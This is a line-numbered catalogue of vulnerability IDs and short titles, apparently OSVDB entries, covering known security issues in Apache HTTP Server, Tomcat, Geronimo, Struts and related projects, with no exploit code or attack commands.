8522| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
8523| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
8524| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
8525| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
8526| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
8527| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
8528| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
8529| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
8530| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
8531| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
8532| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
8533| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
8534| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
8535| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
8536| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
8537| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
8538| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
8539| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
8540| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
8541| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
8542| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
8543| [58687] Apache Axis Invalid wsdl Request XSS
8544| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
8545| [58685] Apache Velocity Template Designer Privileged Code Execution
8546| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
8547| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
8548| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
8549| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
8550| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
8551| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
8552| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
8553| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
8554| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
8555| [58667] Apache Roller Database Cleartext Passwords Disclosure
8556| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
8557| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
8558| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
8559| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
8560| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
8561| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
8562| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
8563| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
8564| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
8565| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
8566| [56984] Apache Xerces2 Java Malformed XML Input DoS
8567| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
8568| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
8569| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
8570| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
8571| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
8572| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
8573| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
8574| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
8575| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
8576| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
8577| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
8578| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
8579| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
8580| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
8581| [55056] Apache Tomcat Cross-application TLD File Manipulation
8582| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
8583| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
8584| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
8585| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
8586| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
8587| [54589] Apache Jserv Nonexistent JSP Request XSS
8588| [54122] Apache Struts s:a / s:url Tag href Element XSS
8589| [54093] Apache ActiveMQ Web Console JMS Message XSS
8590| [53932] Apache Geronimo Multiple Admin Function CSRF
8591| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
8592| [53930] Apache Geronimo /console/portal/ URI XSS
8593| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
8594| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
8595| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
8596| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
8597| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
8598| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
8599| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
8600| [53380] Apache Struts Unspecified XSS
8601| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
8602| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
8603| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
8604| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
8605| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
8606| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
8607| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
8608| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
8609| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
8610| [51151] Apache Roller Search Function q Parameter XSS
8611| [50482] PHP with Apache php_value Order Unspecified Issue
8612| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
8613| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
8614| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
8615| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
8616| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
8617| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
8618| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
8619| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
8620| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
8621| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
8622| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
8623| [47096] Oracle Weblogic Apache Connector POST Request Overflow
8624| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
8625| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
8626| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
8627| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
8628| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
8629| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
8630| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
8631| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
8632| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
8633| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
8634| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
8635| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
8636| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
8637| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
8638| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
8639| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
8640| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
8641| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
8642| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
8643| [43452] Apache Tomcat HTTP Request Smuggling
8644| [43309] Apache Geronimo LoginModule Login Method Bypass
8645| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
8646| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
8647| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
8648| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
8649| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
8650| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
8651| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
8652| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
8653| [42091] Apache Maven Site Plugin Installation Permission Weakness
8654| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
8655| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
8656| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
8657| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
8658| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
8659| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
8660| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
8661| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
8662| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
8663| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
8664| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
8665| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
8666| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
8667| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
8668| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
8669| [40262] Apache HTTP Server mod_status refresh XSS
8670| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
8671| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
8672| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
8673| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
8674| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
8675| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
8676| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
8677| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
8678| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
8679| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
8680| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
8681| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
8682| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
8683| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
8684| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
8685| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
8686| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
8687| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
8688| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
8689| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
8690| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
8691| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
8692| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
8693| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
8694| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
8695| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
8696| [36080] Apache Tomcat JSP Examples Crafted URI XSS
8697| [36079] Apache Tomcat Manager Uploaded Filename XSS
8698| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
8699| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
8700| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
8701| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
8702| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
8703| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
8704| [34881] Apache Tomcat Malformed Accept-Language Header XSS
8705| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
8706| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
8707| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
8708| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
8709| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
8710| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
8711| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
8712| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
8713| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
8714| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
8715| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
8716| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
8717| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
8718| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
8719| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
8720| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
8721| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
8722| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
8723| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
8724| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
8725| [32724] Apache mod_python _filter_read Freed Memory Disclosure
8726| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
8727| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
8728| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
8729| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
8730| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
8731| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
8732| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
8733| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
8734| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
8735| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
8736| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
8737| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
8738| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
8739| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
8740| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
8741| [24365] Apache Struts Multiple Function Error Message XSS
8742| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
8743| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
8744| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
8745| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
8746| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
8747| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
8748| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
8749| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
8750| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
8751| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
8752| [22459] Apache Geronimo Error Page XSS
8753| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
8754| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
8755| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
8756| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
8757| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
8758| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
8759| [21021] Apache Struts Error Message XSS
8760| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
8761| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
8762| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
8763| [20439] Apache Tomcat Directory Listing Saturation DoS
8764| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
8765| [20285] Apache HTTP Server Log File Control Character Injection
8766| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
8767| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
8768| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
8769| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
8770| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
8771| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
8772| [19821] Apache Tomcat Malformed Post Request Information Disclosure
8773| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
8774| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
8775| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
8776| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
8777| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
8778| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
8779| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
8780| [18233] Apache HTTP Server htdigest user Variable Overfow
8781| [17738] Apache HTTP Server HTTP Request Smuggling
8782| [16586] Apache HTTP Server Win32 GET Overflow DoS
8783| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
8784| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
8785| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
8786| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
8787| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
8788| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
8789| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
8790| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
8791| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
8792| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
8793| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
8794| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
8795| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
8796| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
8797| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
8798| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
8799| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
8800| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
8801| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
8802| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
8803| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
8804| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
8805| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
8806| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
8807| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
8808| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
8809| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
8810| [13304] Apache Tomcat realPath.jsp Path Disclosure
8811| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
8812| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
8813| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
8814| [12848] Apache HTTP Server htdigest realm Variable Overflow
8815| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
8816| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
8817| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
8818| [12557] Apache HTTP Server prefork MPM accept Error DoS
8819| [12233] Apache Tomcat MS-DOS Device Name Request DoS
8820| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
8821| [12231] Apache Tomcat web.xml Arbitrary File Access
8822| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
8823| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
8824| [12178] Apache Jakarta Lucene results.jsp XSS
8825| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
8826| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
8827| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
8828| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
8829| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
8830| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
8831| [10471] Apache Xerces-C++ XML Parser DoS
8832| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
8833| [10068] Apache HTTP Server htpasswd Local Overflow
8834| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
8835| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
8836| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
8837| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
8838| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
8839| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
8840| [9717] Apache HTTP Server mod_cookies Cookie Overflow
8841| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
8842| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
8843| [9714] Apache Authentication Module Threaded MPM DoS
8844| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
8845| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
8846| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
8847| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
8848| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
8849| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
8850| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
8851| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
8852| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
8853| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
8854| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
8855| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
8856| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
8857| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
8858| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
8859| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
8860| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
8861| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
8862| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
8863| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
8864| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
8865| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
8866| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
8867| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
8868| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
8869| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
8870| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
8871| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
8872| [9208] Apache Tomcat .jsp Encoded Newline XSS
8873| [9204] Apache Tomcat ROOT Application XSS
8874| [9203] Apache Tomcat examples Application XSS
8875| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
8876| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
8877| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
8878| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
8879| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
8880| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
8881| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
8882| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
8883| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
8884| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
8885| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
8886| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
8887| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
8888| [7611] Apache HTTP Server mod_alias Local Overflow
8889| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
8890| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
8891| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
8892| [6882] Apache mod_python Malformed Query String Variant DoS
8893| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
8894| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
8895| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
8896| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
8897| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
8898| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
8899| [5526] Apache Tomcat Long .JSP URI Path Disclosure
8900| [5278] Apache Tomcat web.xml Restriction Bypass
8901| [5051] Apache Tomcat Null Character DoS
8902| [4973] Apache Tomcat servlet Mapping XSS
8903| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
8904| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
8905| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
8906| [4568] mod_survey For Apache ENV Tags SQL Injection
8907| [4553] Apache HTTP Server ApacheBench Overflow DoS
8908| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
8909| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
8910| [4383] Apache HTTP Server Socket Race Condition DoS
8911| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
8912| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
